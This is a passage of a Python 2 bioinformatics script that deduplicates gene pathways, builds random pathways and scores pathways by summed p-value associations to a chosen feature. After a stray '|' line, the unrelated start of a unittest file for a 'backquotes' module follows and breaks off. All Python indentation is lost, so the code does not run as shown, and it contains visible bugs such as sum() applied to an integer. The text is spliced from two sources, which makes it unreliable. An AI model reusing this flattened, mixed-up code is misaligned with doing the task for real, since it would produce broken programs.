pwList.sort()
delList = []
pairDict = {}
for ii in range(len(pwList)-1):
iiName = pwList[ii]
iiLen = len(pwDict[iiName])
for jj in range(ii+1,len(pwList)):
jjName = pwList[jj]
jjLen = len(pwDict[jjName])
if ( jjLen != iiLen ): continue
if ( pwDict[iiName] == pwDict[jjName] ):
if ( debugFlag ):
print "\n\n SAME !!! "
print iiName, iiLen
print pwDict[iiName]
print jjName, jjLen
print pwDict[jjName]
iiSplit = iiName.split('__')
jjSplit = jjName.split('__')
if ( iiSplit[1] <= jjSplit[1] ):
pairNames = ( iiSplit[1], jjSplit[1] )
else:
pairNames = ( jjSplit[1], iiSplit[1] )
if ( pairNames in pairDict.keys() ):
pairDict[pairNames] += 1
else:
pairDict[pairNames] = 1
if ( iiSplit[1] == jjSplit[1] ):
if ( len(iiName) <= len(jjName) ):
delList += [ jjName ]
else:
delList += [ iiName ]
else:
if ( iiSplit[1] == "NCI-NATURE" ):
delList += [ jjName ]
elif ( jjSplit[1] == "NCI-NATURE" ):
delList += [ iiName ]
elif ( iiSplit[1] == "PID" ):
delList += [ jjName ]
elif ( jjSplit[1] == "PID" ):
delList += [ iiName ]
elif ( iiSplit[1] == "KEGG" ):
delList += [ jjName ]
elif ( jjSplit[1] == "KEGG" ):
delList += [ iiName ]
elif ( iiSplit[1] == "PWCOMMONS" ):
delList += [ jjName ]
elif ( jjSplit[1] == "PWCOMMONS" ):
delList += [ iiName ]
elif ( iiSplit[1] == "REACTOME" ):
delList += [ jjName ]
elif ( jjSplit[1] == "REACTOME" ):
delList += [ iiName ]
elif ( iiSplit[1] == "WIKIPATHWAYS" ):
delList += [ jjName ]
elif ( jjSplit[1] == "WIKIPATHWAYS" ):
delList += [ iiName ]
elif ( iiSplit[1] == "WIKIPW" ):
delList += [ jjName ]
elif ( jjSplit[1] == "WIKIPW" ):
delList += [ iiName ]
elif ( iiSplit[1] == "SMPDB" ):
delList += [ jjName ]
elif ( jjSplit[1] == "SMPDB" ):
delList += [ iiName ]
elif ( iiSplit[1] == "HUMANCYC" ):
delList += [ jjName ]
elif ( jjSplit[1] == "HUMANCYC" ):
delList += [ iiName ]
else:
sys.exit(-1)
for aName in delList:
try:
del pwDict[aName]
except:
doNothing = 1
print "## "
print "## returning pathway dictionary with %d pathways " % len(pwDict)
print "## "
if ( debugFlag ):
for aKey in pairDict.keys():
print aKey, pairDict[aKey]
print " "
print " "
return ( pwDict )
#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#
def addRandomPathways ( pwDict, numRandFactor ):
numRand = numRandFactor * len(pwDict)
( randDict, minLen, maxLen ) = makeRandomPathways ( pwDict, numRand )
print "## --> adding %d random pathways to original set of %d pathways " % ( len(randDict), len(pwDict ) )
if ( 1 ):
print "## using current system time to set seed "
random.seed()
for aKey in randDict.keys():
pwDict[aKey] = randDict[aKey]
print "## --> returning pathway dictionary with %d pathways " % len(pwDict)
return ( pwDict, minLen, maxLen )
#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#
def pickRandom ( aList ):
ii = random.randint ( 0, len(aList)-1 )
return ( aList[ii] )
#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#
def makeRandomPathways ( pwDict, numRand ):
pwLenList = []
pwGeneList = []
randDict = {}
## create a non-unique gene list ... meaning that if a gene appears many
## times in different pathways, then it will appear many times in this
## list and will get selected many times to create random pathways
## geneListFlag = 'unique'
geneListFlag = 'NOT-unique'
print "## in makeRandomPathways ... ", len(pwDict), numRand, geneListFlag
for aPw in pwDict.keys():
for aGene in pwDict[aPw]:
if ( geneListFlag == 'unique' ):
if ( aGene not in pwGeneList ):
pwGeneList += [ aGene ]
elif ( geneListFlag == 'NOT-unique' ):
pwGeneList += [ aGene ]
else:
print "## ERROR ??? invalid geneListFlag ", geneListFlag
sys.exit(-1)
curLen = len(pwDict[aPw])
if ( 0 ):
pwLenList += [ curLen ]
else:
## or maybe we should only do unique pathway sizes so that we get
## a better distribution for both common and uncommon pathway sizes?
if ( curLen not in pwLenList ):
pwLenList += [ curLen ]
pwLenList.sort()
print "## len(pwGeneList) = %d " % len(pwGeneList)
print "## len(pwLenList) = %d " % len(pwLenList), min(pwLenList), max(pwLenList)
print "## ", pwLenList
jRand = 0
for iRand in range(numRand):
## work through the length options methodically ...
curLen = pwLenList[jRand]
jRand += 1
if ( jRand == len(pwLenList) ): jRand = 0
curList = []
while ( len(curList) < curLen ):
aGene = pickRandom ( pwGeneList )
if ( aGene not in curList ):
curList += [ aGene ]
curName = "RANDOM_PATHWAY_%d__%d" % ( (iRand+1), curLen )
randDict[curName] = curList
## print curName, curList
minLen = min(pwLenList)
maxLen = max(pwLenList)
return ( randDict, minLen, maxLen )
#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#
def getPairwisePvalues ( pwpvFilename, pwGeneList, featureName, geneDataType,
maxDist, corrSign, minLogP ):
pwpvData = {}
fh = file ( pwpvFilename )
firstCheck = 1
if ( debugFlag ): print " ... working our way through <%s> ... " % pwpvFilename
numLines = 0
for aLine in fh:
numLines += 1
if ( numLines%10000000 == 0 ):
print "## ", numLines, len(pwpvData)
if ( aLine.find(geneDataType) < 0 ): continue
tokenList = aLine.split('\t')
## print tokenList
if ( len(tokenList) < 12 ): continue
## if a minimum distance has been set, then check that ...
abDist = -1
if ( maxDist >= 0 ):
try:
abDist = int ( tokenList[11] )
if ( abDist > maxDist ): continue
except:
print "## HUH ??? failed to get distance ??? "
print "## ", tokenList
sys.exit(-1)
## grab the two feature names
try:
aLabel = tokenList[0]
bLabel = tokenList[1]
except:
print "## HUH ??? failed to get two feature names ??? "
print "## ", tokenList
sys.exit(-1)
skipFlag = 1
aMatch = ( aLabel == featureName )
bMatch = ( bLabel == featureName )
if ( aMatch ):
if ( bLabel.startswith(geneDataType) ):
bTokens = bLabel.split(':')
bGene = bTokens[2]
if ( bGene in pwGeneList ):
skipFlag = 0
aKey = bGene
elif ( bMatch ):
if ( aLabel.startswith(geneDataType) ):
aTokens = aLabel.split(':')
aGene = aTokens[2]
if ( aGene in pwGeneList ):
skipFlag = 0
aKey = aGene
if ( skipFlag ): continue
pValue = float ( tokenList[4] )
if ( abDist < 0 ): abDist = int ( tokenList[11] )
## moved this again ... 13dec13
## if the correlation sign does not match the ones we have been
## told to look for, then the pValue gets forced to ZERO
## (ie completely insignificant)
try:
corrVal = float ( tokenList[2] )
except:
corrVal = "NA"
if ( corrSign != "" ):
if ( tokenList[2] != "NA" ):
if ( corrSign == '+' ):
if ( corrVal < 0. ):
pValue = 0.
corrVal = 0.
elif ( corrSign == '-' ):
if ( corrVal > 0. ):
pValue = 0.
corrVal = 0.
else:
if ( firstCheck ):
print " WARNING !!! correlation sign not known ... careful interpreting results ", tokenList
firstCheck = 0
try:
( oldP, oldDist ) = pwpvData[aKey]
if ( oldP < pValue ):
pwpvData[aKey] = ( pValue, corrVal, abDist )
except:
pwpvData[aKey] = ( pValue, corrVal, abDist )
fh.close()
## filter out the lower p-values (optional)
if ( minLogP > 0 ):
pwpvData = filterLowP ( pwpvData, minLogP )
print "## returning from getPairwisePvalues ... ", numLines, len(pwpvData)
if ( debugFlag ): print " --> DONE ... have p-values for %d pairs " % len(pwpvData)
return ( pwpvData )
#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#
def findTopGenes ( pwpvData, nTop ):
print "## "
print "## "
allKeys = pwpvData.keys()
numKeys = len(allKeys)
if ( numKeys < nTop ):
nTop2 = numKeys
else:
nTop2 = nTop
pList = []
for aKey in allKeys:
pList += [ pwpvData[aKey][0] ]
pList.sort(reverse=True)
pThresh = pList[nTop2-1]
print "## range of p-values: %.1f to %.1f " % ( pList[-1], pList[0] )
if ( 0 ):
for ii in range(len(pList)):
print "## pList.sort \t %4d \t %5.1f " % ( ii, pList[ii] )
print "## p-value threshold for top %d genes is %.1f " % ( nTop2, pThresh )
topGenes = []
topPs = []
for aKey in allKeys:
if ( pwpvData[aKey][0] >= pThresh ):
topGenes += [ aKey ]
curP = pwpvData[aKey][0]
topPs += [ curP ]
print "## top-scoring genes (not sorted) : "
for ii in range(nTop2):
try:
print "## %16s %6.1f " % ( topGenes[ii], topPs[ii] )
except:
doNothing = 1
print "## "
print "## "
return ( topGenes )
#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#
def pwMembership ( pwDict, topGenes ):
print "## "
print "## in pwMembership ... "
print "## topGenes list : ", topGenes
print "## "
oLapDict = {}
maxO = 0
for aPW in pwDict.keys():
if ( aPW.startswith("RANDOM_PATHWAY") ): continue
numO = 0
for aGene in topGenes:
if ( aGene in pwDict[aPW] ):
numO += 1
if ( numO > 1 ):
if ( numO in oLapDict.keys() ):
oLapDict[numO] += [ aPW ]
else:
oLapDict[numO] = [ aPW ]
if ( maxO < numO ):
maxO = numO
print "## "
print "## pathway membership of the top-scoring genes : "
for ii in range(maxO,0,-1):
if ( ii in oLapDict.keys() ):
if ( len(oLapDict[ii]) > 0 ):
print "## %3d " % ii, oLapDict[ii]
print "## "
#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#
def pwMembership2 ( pwDict, pwpvData ):
allKeys = pwpvData.keys()
numKeys = len(allKeys)
for aPW in pwDict.keys():
if ( aPW.startswith("RANDOM_PATHWAY") ): continue
numO = 0
oLapDict = {}
for aGene in allKeys:
## print aGene, pwpvData[aGene]
if ( aGene in pwDict[aPW] ):
numO += 1
pVal = pwpvData[aGene][0]
rhoV = pwpvData[aGene][1]
if ( pVal in oLapDict.keys() ):
oLapDict[pVal] += [ ( aGene, rhoV ) ]
else:
oLapDict[pVal] = [ ( aGene, rhoV ) ]
if ( len(oLapDict) > 0 ):
oLapKeys = oLapDict.keys()
oLapKeys.sort(reverse=True)
outLine = "## pwMembership2: %3d %s (%d) " % ( numO, aPW, len(oLapKeys) )
## print len(oLapKeys), oLapKeys[0], oLapDict[oLapKeys[0]]
for aKey in oLapKeys:
for aTuple in oLapDict[aKey]:
aGene = aTuple[0]
rhoV = aTuple[1]
try:
outLine += " (%s, %.1f, %.1f) " % ( aGene, rhoV, aKey )
except:
if ( rhoV == "NA" ):
outLine += " (%s, NA, %.1f) " % ( aGene, aKey )
else:
print " ERROR adding to outLine ??? ", aGene, rhoV, aKey
print outLine
#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#
## pwpvData has keys like ('sampleType', 'TP53BP1')
## and values like (7.5, 500000000)
## where the first value is the -log(p) and the second is the genomic distance
def filterLowP ( pwpvData, minLogP ):
print "## in filterLowP : ", len(pwpvData), minLogP
newD = {}
for aKey in pwpvData.keys():
if ( pwpvData[aKey][0] >= minLogP ):
newD[aKey] = pwpvData[aKey]
print "## after filtering : ", len(newD)
return ( newD )
#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#
def getInfoFromTSV ( tsvFilename, featureName ):
## we start by opening and reading the entire input feature matrix
print "## "
print "## opening input TSV file <%s> " % tsvFilename
print "## "
fh = file ( tsvFilename )
wholeFile = fh.read()
fh.close()
print "## --> data file size : %d " % len(wholeFile)
print "## (b) TIME ", time.asctime(time.localtime(time.time()))
## then we split the file into lines
allLines = wholeFile.split("\n")
numLines = len(allLines)
## extract the row labels from lines 2 thru end ...
## a) build geneList
## b) make sure that the specified featureName(s) exists
tsvGeneList = []
featureIndex = -1
nFound = 0
## keep track of the first few names that match ...
maxNames = 20
namesFound = [0] * maxNames
for ii in range(1,len(allLines)):
aLine = allLines[ii].strip()
lineTokens = aLine.split("\t")
labelTokens = lineTokens[0].split(":")
if ( aLine.startswith(geneDataType) ):
geneSymbol = labelTokens[2]
if ( geneSymbol != '' ):
tsvGeneList += [ geneSymbol ]
if ( 1 ):
curName = featureName
if ( lineTokens[0] == curName ):
if ( featureIndex < 0 ):
featureIndex = ii - 1
nFound += 1
if ( nFound <= maxNames ):
namesFound[nFound-1] = lineTokens[0]
print "## --> length of gene list : %d " % len(tsvGeneList)
print "##"
## if we only found one feature that matched the prefix specified in
## the feature name list, then replace it with the complete feature name
if ( 1 ):
if ( nFound == 1 ):
aLine = allLines[featureIndex+1].strip()
lineTokens = aLine.split("\t")
print "## --> unique feature <%s> found at index %d : %s " % \
( featureName, featureIndex, lineTokens[0] )
featureName = lineTokens[0]
elif ( nFound > 1 ):
print " FATAL ERROR ... NOT ALLOWED ... "
sys.exit(-1)
print "## --> found %d features with <%s> " % ( nFound, featureName )
if ( nFound < maxNames ):
print "## ", namesFound[:nFound]
else:
print "## --> insufficient number of features found ... "
print "## ", nFound, featureName
sys.exit(-1)
elif ( sum(nFound) > 0 ):
print " FATAL ERROR ... NOT ALLOWED ... "
print "## --> found %d features with <%s> " % ( nFound, featureName )
if ( nFound < maxNames ):
print "## ", namesFound[:nFound]
else:
print "## --> insufficient number of features found ... "
print "## ", nFound, featureName
sys.exit(-1)
return ( tsvGeneList )
#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#
def getPathwayInfo ( pathwaysFile ):
## next we need to read the pathway definitions ...
pwDict = readPathways ( pathwaysFile )
pwList = pwDict.keys()
pwList.sort()
print "## --> number of pathways : %d " % len(pwList)
## and form a gene list based on the pathways ...
pwGeneList = []
pwSum1 = 0
pwSum2 = 0
numDup = 0
for aPW in pwList:
## print pwDict[aPW]
pwLen = len(pwDict[aPW])
pwSum1 += pwLen
pwSum2 += ( pwLen * pwLen )
for aGene in pwDict[aPW]:
if ( aGene not in pwGeneList ):
pwGeneList += [ aGene ]
else:
numDup += 1
pwAvg1 = float(pwSum1)/float(len(pwList))
pwAvg2 = float(pwSum2)/float(len(pwList))
pwSigma = math.sqrt ( pwAvg2 - pwAvg1 * pwAvg1 )
print "## --> average # of genes in each pathway : %.1f (%.1f) " % ( pwAvg1, pwSigma )
print "## --> length of pathway gene list : %d (%d) " % ( len(pwGeneList), numDup )
if ( debugFlag ): print pwGeneList
print "## "
print "## (c) TIME ", time.asctime(time.localtime(time.time()))
print "## "
return ( pwDict, pwGeneList )
#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#
def compareGeneLists ( tsvGeneList, pwGeneList, pwDict ):
pwList = pwDict.keys()
pwList.sort()
## NEW: now checking if any of the pathway genes are NOT in the tsvGeneList ???
numNotFound = 0
for aGene in pwGeneList:
if ( aGene not in tsvGeneList ):
print "## gene <%s> in one or more pathways but not in feature matrix " % aGene
numNotFound += 1
if ( numNotFound > 0 ):
print "## --> %d genes found in one or more pathways but not in feature matrix " % numNotFound
pwGeneList = []
for aPW in pwList:
newList = []
for aGene in pwDict[aPW]:
if ( aGene in tsvGeneList ):
newList += [ aGene ]
if ( aGene not in pwGeneList ):
pwGeneList += [ aGene ]
if ( newList != pwDict[aPW] ):
oldLen = len(pwDict[aPW])
del ( pwDict[aPW] )
if ( len(newList) == 0 ):
print "## eliminating pathway <%s> " % ( aPW )
else:
print "## replacing gene list for pathway <%s> (%d -> %d) " % ( aPW, oldLen, len(newList) )
kk = aPW.find("__")
newName = aPW[:kk] + "__" + "%d" % len(newList)
pwDict[newName] = newList
print "## --> new pathway label: <%s> " % newName
print "## --> NEW length of pathway gene list : %d " % ( len(pwGeneList) )
return ( pwGeneList )
#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#
## outLines is a list, and one entry looks like this:
## [493.7, [' 493.7', 'RANDOM_PATHWAY_33329__72', '\n']]
def parseOutput ( pwScores, pwDict ):
pwKeys = pwDict.keys()
pwKeys.sort()
maxScore = -999999
minScore = 999999
outLines = []
for ii in range(len(pwScores)):
curScore = pwScores[ii]
if ( curScore > maxScore ): maxScore = curScore
if ( curScore < minScore ): minScore = curScore
curPW = pwKeys[ii]
aLine = [ curScore, [ str(curScore), curPW ] ]
outLines += [ aLine ]
return ( outLines, maxScore, minScore )
#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#
def scoreOutput ( outLines, iMaxScore, iMinScore, pwDict ):
iMaxScore = int ( iMaxScore + 0.5 )
iMinScore = int ( iMinScore )
## no need to have too many discrete values ... just makes the counts matrix
## too big and slows everything down ...
min_sFactor = 10.
## min_sFactor = 2.
sFactor = max ( float(iMaxScore/2001.), min_sFactor )
iMaxScore = int ( float(iMaxScore/sFactor) + 0.5 )
## forcing iMinScore to zero ... after this it will not really be used ...
iMinScore = 0
print "## range of integer scores we will use : ", iMinScore, iMaxScore
print "## using score scale factor : ", sFactor
numOut = len(outLines)
print "## numOut = ", numOut
numReal = float(numOut)/float(numRandFactor+1)
numRand = numOut - numReal
print "## numReal = ", numReal
print "## numRand = ", numRand
print "## (i) TIME ", time.asctime(time.localtime(time.time()))
## NEW:
## we will build up a matrix of numHi/numLo counts as a function of
## pathway size (n), and pathway score (s)
## also at this point forcing minLen to 0 ... will not really be used after this
minLen = 0
numN = int ( maxLen ) + 1
numS = int ( iMaxScore + 1 ) + 1
print "## size of countsHiLo matrix: %d x %d ... [%d,%d] and [%d,%d]" % \
( numN, numS, minLen, maxLen, iMinScore, iMaxScore )
countsHiLo = [0] * numN
for iN in range(numN):
countsHiLo[iN] = [0] * numS
for iS in range(numS):
countsHiLo[iN][iS] = [0,0]
print "## (j) TIME ", time.asctime(time.localtime(time.time()))
print "## now setting up countsHiLo matrix ... "
## set up a dictionary that maps from pathway name to pathway length so we
## don't have to figure that out repeatedly ...
pwLenDict = {}
for aPW in pwDict.keys():
curPW = aPW
kk = curPW.find("__")
curLen = int ( curPW[kk+2:] )
pwLenDict[curPW] = curLen
## we only need to loop once over all of the pathways that have been scored
## and then increment the appropriate counts
for iTuple in range(len(outLines)):
keyVal = outLines[iTuple][0]
tokenList = outLines[iTuple][1]
curPW = tokenList[1]
## if ( iTuple%1000 == 0 ): print iTuple, keyVal, tokenList, curPW
if ( 1 ):
## we will only consider random pathways
if ( curPW.find("RANDOM") >= 0 ):
if ( 0 ):
kk = curPW.find("__")
rndLen = int ( curPW[kk+2:] )
else:
rndLen = pwLenDict[curPW]
rndScore = float ( keyVal )
rndScore = int ( (rndScore/sFactor) + 0.5 )
if ( 0 ):
print "## random pathway ... %d %d %s " % ( rndLen, rndScore, curPW )
print "## increment HI counts from (%d,0) to (%d,%d) " % ( rndLen, numN-1, rndScore )
print "## and LO counts from (0,%d) to (%d,%d) " % ( rndScore+1, rndLen-1, numS-1 )
## ----------------------------------------- ##
## THIS IS THE CODE CURRENTLY BEING USED !!! ##
## ----------------------------------------- ##
## current score is (n,s) ranges are: 0 thru N-1 and 0 thru S-1
## THIS random pathway will be considered 'better' (HI) than ~real~ pathways
## that are longer and score worse ... and will be considered 'worse' (LO)
## than ~real~ pathways that are shorter and score better
if ( 1 ):
## first increment the HI counts ...
## for pathway lengths greater than or equal to (n, n+1, n+2, ... N-1)
## and scores less than or equal to (0, 1, 2, ... s-1)
for iN in range(rndLen, numN):
for iS in range(0, rndScore+1):
countsHiLo[iN][iS][0] += 1
## and then the LO counts ...
## for pathway lengths less than or equal to (0, 1, 2, ... n)
## and scores greater than (s+1, s+2, s+3, ... S-1)
for iN in range(0, rndLen):
for iS in range(rndScore+1,numS):
countsHiLo[iN][iS][1] += 1
print "## (k) TIME ", time.asctime(time.localtime(time.time()))
print "## now computing estimated p values ... "
## and once we have the countsHiLo matrix we do one more pass to estimate the p-values
estLogP = [0] * len(outLines)
for iTuple in range(len(outLines)):
keyVal = outLines[iTuple][0]
tokenList = outLines[iTuple][1]
curPW = tokenList[1]
## if ( iTuple%1000 == 0 ): print iTuple, keyVal, tokenList, curPW
if ( 1 ):
kk = curPW.find("__")
curLen = int ( curPW[kk+2:] )
curScore = float ( keyVal )
curScore = int ( (curScore/sFactor) + 0.5 )
numHi = countsHiLo[curLen][curScore][0]
numLo = countsHiLo[curLen][curScore][1]
## print "## --> curLen=%d curScore=%d numHi=%d numLo=%d " % ( curLen, curScore, numHi, numLo )
try:
try:
tmpLogP = -1. * math.log10 ( float(numHi+1)/float(numHi+numLo+1) )
except:
print " ERROR computing tmpLogP ??? ", numHi, numLo
sys.exit(-1)
try:
estLogP[iTuple] = ( tmpLogP, numHi, numLo )
except:
print " ERROR storing tuple ??? ", tmpLogP, numHi, numLo
print iTuple, len(estLogP)
print estLogP
sys.exit(-1)
try:
## print " ", iTuple, curLen, curScore, tmpLogP
if ( 1 ):
if ( tmpLogP >= 1. ):
if ( (numHi+numLo) < numRandFactor ):
print "## maybe too few counts for p-value estimate ??? ", (numHi+numLo), numHi, numLo
except:
print " stupid stupid stupid error "
sys.exit(-1)
except:
print "## failed in attempt to estimate p value ??? ", numHi, numLo
sys.exit(-1)
return ( countsHiLo, estLogP )
#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#
def prettyPrintScores ( outLines, estLogP ):
print "## "
print "## (l) TIME ", time.asctime(time.localtime(time.time()))
print "## "
print "## RANKED and SCORED Pathways : "
print "## "
for iTuple in range(len(outLines)):
keyVal = outLines[iTuple][0]
tokenList = outLines[iTuple][1]
curPW = tokenList[1]
if ( 1 ):
try:
outLine = "%.2f\t%d\t%d\t" % ( estLogP[iTuple][0], estLogP[iTuple][1], estLogP[iTuple][2] )
except:
outLine = "-99\t-99\t-99\t"
for aToken in tokenList:
if ( aToken == '\n' ):
doNothing = 1
elif ( aToken.endswith('\n') ):
outLine += "%s\t" % aToken[:-1]
else:
outLine += "%s\t" % aToken
print outLine
#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#
# ok ... cleaning this function up entirely ...
# pwDict is the pathway dictionary, including random pathways -- keys are
# pathway names, and associated with each key is a list of gene symbols
# pwpvData is the pairwise data dict, where the keys are gene symbols and
# associated to each key is a tuple ( -log(p), rho, dist )
def goScorePathways ( pwDict, pwpvData ):
pwKeys = pwDict.keys()
pwKeys.sort()
pwpvKeys = pwpvData.keys()
## print " pwDict ", len(pwDict), pwKeys[0], pwDict[pwKeys[0]]
## print " pwpvData ", len(pwpvData), pwpvKeys[0], pwpvData[pwpvKeys[0]]
# we really just want a dictionary with the p-values and not those data triples ...
pDict = {}
for aKey in pwpvKeys:
pVal = pwpvData[aKey][0]
if ( pVal > 0. ):
pDict[aKey] = pVal
# and now we can score each pathway ...
pwScores = [0] * len(pwKeys)
for ii in range(len(pwKeys)):
if ( 0 ):
if ( ii%50000 == 0 ):
print "## (z) TIME ", ii, time.asctime(time.localtime(time.time()))
curPW = pwKeys[ii]
for aGene in pwDict[curPW]:
try:
pwScores[ii] += pDict[aGene]
except:
doNothing=1
print "## range of pathway scores : ", min(pwScores), max(pwScores)
return ( pwScores )
#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#
#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#
## this functions seeks to score/rank pathways (which can also be just arbitrary
## lists of genes) based on associations to a particular feature (or set of
## features)
##
## inputs required:
## a TSV feature matrix
## a corresponding pairwise output file
## a pathways-definition file
## a feature name of interest, eg C:SAMP:PAM50_call or B:GNAB:driverMut:
## the gene-based data type (typically N:GEXP: but can be N:METH:)
## the maximum genomic distance allowed betwen the two features in any
## significant association -- this is typically used to require
## that the two features be close together ... if they can be
## any distance apart, then use -1 (NOTE that there is no way to
## force them to be at least X distance apart)
## an optional threshold on the p-values (-log(p)) >= 0
## an optional correlation sign ('+' or '-')
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='pathway-scoring')
parser.add_argument('--tsvFile', '-tsv', action='store', required=True)
parser.add_argument('--pwpvFile', '-pw', action='store', required=True)
parser.add_argument('--pathways', '-P', action='store', required=True)
parser.add_argument('--featName', '-f', action='store', required=True)
parser.add_argument('--dataType', '-d', action='store', default="N:GEXP:")
parser.add_argument('--maxDist', '-D', action='store', default=-1, type=int)
parser.add_argument('--pThresh', '-T', action='store', default= 0, type=float)
parser.add_argument('--sign', '-s', action='store', default='x')
parser.add_argument('--nRand', '-N', action='store', default=1000, type=int)
args = parser.parse_args()
tsvFilename = args.tsvFile
pwpvFilename = args.pwpvFile
pathwaysFile = args.pathways
featureNameString = args.featName
geneDataType = args.dataType
maxDist = args.maxDist
minLogP = args.pThresh
corrSign = args.sign
numRandFactor = args.nRand
if ( corrSign != '+' ):
if ( corrSign != '-' ):
corrSign = ''
print "## RUNNING %s with : " % sys.argv[0]
print "## %s " % tsvFilename
print "## %s " % pwpvFilename
print "## %s " % pathwaysFile
print "## %s = geneDataType " % geneDataType
print "## %d = maxDist " % maxDist
print "## %s = corrSign " % corrSign
print "## %d = numRandFactor " % numRandFactor
## the 'featureNameString' might be a semi-colon separated list ...
if ( featureNameString.find(";") > 0 ):
print " FATAL ERROR ... THIS IS NOT ALLOWED ... "
print " <%s> " % featureNameString
sys.exit(-1)
else:
featureName = featureNameString
print "## %s " % featureName
print "## (a) TIME ", time.asctime(time.localtime(time.time()))
## ------------------------------------------------------------------------
## first we need some information from the feature matrix (TSV) ...
tsvGeneList = getInfoFromTSV ( tsvFilename, featureName )
## print tsvGeneList[:5]
## print tsvGeneList[-5:]
## ------------------------------------------------------------------------
## next we need to read the pathway definitions and form a gene list ...
( pwDict, pwGeneList ) = getPathwayInfo ( pathwaysFile )
## --> pwDict is a dictionary with 224 pathways, with names, like "PS1PATHWAY__46"
## and each pathway is a list of gene symbols
## --> pwGeneList is a list of ~2600 genes
if ( 0 ):
print len(pwDict)
aKey = pwDict.keys()[0]
print aKey
print pwDict[aKey]
print len(pwGeneList)
print pwGeneList[:5]
## ------------------------------------------------------------------------
## check pwGeneList against tsvGeneList ... and remove gene symbols that
## are in the pwGeneList that we don't know anything about (ie are not in
## the tsvGeneList)
pwGeneList = compareGeneLists ( tsvGeneList, pwGeneList, pwDict )
print "## (d) TIME ", time.asctime(time.localtime(time.time()))
## ------------------------------------------------------------------------
## now we can read in all pairwise information that we have for these
## genes ...
print "## --> reading in pairwise (PWPV) data ... "
pwpvData = getPairwisePvalues ( pwpvFilename, pwGeneList, featureName, \
geneDataType, maxDist, corrSign, minLogP )
if ( len(pwpvData) == 0 ):
print "## ERROR ??? how do we not have any information here ??? "
sys.exit(-1)
print "## --> got %d values ... " % len(pwpvData)
print "## (f) TIME ", time.asctime(time.localtime(time.time()))
## when we get here, the keys in pwpvData are just the gene symbols
## and the data associdated with a key is a tuple: ( -log(p), rho, dist )
keyList = pwpvData.keys()
if ( debugFlag ):
print keyList[:5]
print pwpvData[keyList[0]]
## ------------------------------------------------------------------------
## so what *are* the top 20 genes and what is the maximum s20 score ???
## NOTE that by this point we have filtered OUT any genes that are not in the pwGeneList !!!
topGenes = findTopGenes ( pwpvData, 20 )
## print " HERE (a) "
## report on pathway membership of the top 20 genes ...
pwMembership ( pwDict, topGenes )
## print " HERE (b) "
## 15may13 ... or look at pathway membership of all associated genes ???
pwMembership2 ( pwDict, pwpvData )
## print " HERE (c) "
## ------------------------------------------------------------------------
## finally we need to generate the "random" pathways ...
( pwDict, minLen, maxLen ) = addRandomPathways ( pwDict, numRandFactor )
print "## range of pathway lengths : ", minLen, maxLen
print "## (e) TIME ", time.asctime(time.localtime(time.time()))
## print " HERE (d) "
## ------------------------------------------------------------------------
## and now we can finally compute the scores for all of the pathways
## on the cluster ...
pwScores = goScorePathways ( pwDict, pwpvData )
if ( debugFlag ): print len(myOutput)
## next parse the output ...
( outLines, iMaxScore, iMinScore ) = parseOutput ( pwScores, pwDict )
## outLines is a list, and one entry looks like this:
## [493.7, [' 493.7', 'RANDOM_PATHWAY_33329__72', '\n']]
## and now use the 'real' and 'random' pathway scores to build
## a hi/lo counts matrix and estimate significance ...
( countsHiLo, estLogP ) = scoreOutput ( outLines, iMaxScore, iMinScore, pwDict )
## and finally pretty-print the output ...
prettyPrintScores ( outLines, estLogP )
print "## "
print "## (m) TIME (DONE) ", time.asctime(time.localtime(time.time()))
print "## "
#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#
|
# -*- coding:utf-8 -*-
import distutils.version
import os
import subprocess
import sys
import tempfile
import textwrap
import unittest
try:
from test.test_support import EnvironmentVarGuard, captured_stdout
except ImportError:
from test.support import EnvironmentVarGuard, captured_stdout
try:
from unittest.mock import MagicMock, patch
except ImportError:
from mock import MagicMock, patch
import backquotes
class TestBackquotes(unittest.TestCase):
def test___all__(self):
